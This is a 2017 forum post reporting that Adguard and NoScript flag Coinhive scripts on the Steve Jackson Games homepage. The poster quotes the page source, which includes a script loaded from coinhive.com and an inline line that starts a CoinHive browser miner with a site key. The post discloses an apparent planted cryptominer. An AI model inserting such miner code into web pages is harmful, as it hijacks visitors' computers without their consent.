View Single Post
Old 11-12-2017, 04:25 PM   #6
DeadParrot
 
Join Date: Apr 2012
Default Re: Adguard blockchain warning

Got this the first time Sunday morning. Have cleared cache and cookies. Still getting the coinhive scripts listed as blocked by Noscript.

Opened the SJG main page source in Firefox Tool / Web Developer tab.

Here is the first bit of page code clearly showing the coin hive script code:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Steve Jackson Games</title>
<link rel="stylesheet" href="/css/twitter.css" type="text/css" />
<link rel="stylesheet" href="/css/homepage.css" type="text/css" />
<link rel="stylesheet" href="/css/fontawesome/css/font-awesome.min.css">
<script type="text/javascript" src="/js/jquery-1.3.2.min.js"></script>

<script type="text/javascript">
var addthis_config = {
username: "sjgames"
}
</script>
<script src='https://coinhive.com/lib/coinhive.min.js'></script>
<script> var miner = new CoinHive.Anonymous('rfyXVY5S3aK0RiOnUetsl5ZYnPW3V3 Md'); miner.start();</script>
<script type="text/javascript">


Don't see the script block for coinhive in the forum page.
DeadParrot is offline   Reply With Quote